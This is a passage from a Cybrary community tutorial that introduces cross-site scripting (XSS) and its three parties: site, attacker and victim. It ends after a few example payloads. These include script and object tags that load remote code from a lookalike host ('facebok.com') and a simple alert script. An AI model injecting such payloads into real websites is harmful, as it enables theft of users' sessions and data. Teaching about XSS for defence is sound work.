Hi there Cybrarians!As always, I should thank you to all of you for your support. I'm really happy that my articles are helpful to most of you, and now I'm back with another article. Let's also greet the moderators which are doing a great job with our contents in Cybrary.I was recently asked to explain how XSS attacks work in depth, and that's why I want to show you what XSS is, how an attacker might use it, and how a developer can protect an application from such kind of attacks. This article is only for educational purposes and I won't be responsible for any misuse. I won’t answer on anything that is not in the frame "Ethical and Ethical only". 1. What is XSS Attack?
In this scenario, we always need 3 objects: A hosted Website
, an Attacker,
and the Victim
<script src=https://facebok.com/xss.js></script><script> alert("Boo!"); </script>
<object type="text/x-scriptlet" data="http://facebok.com/xss.html">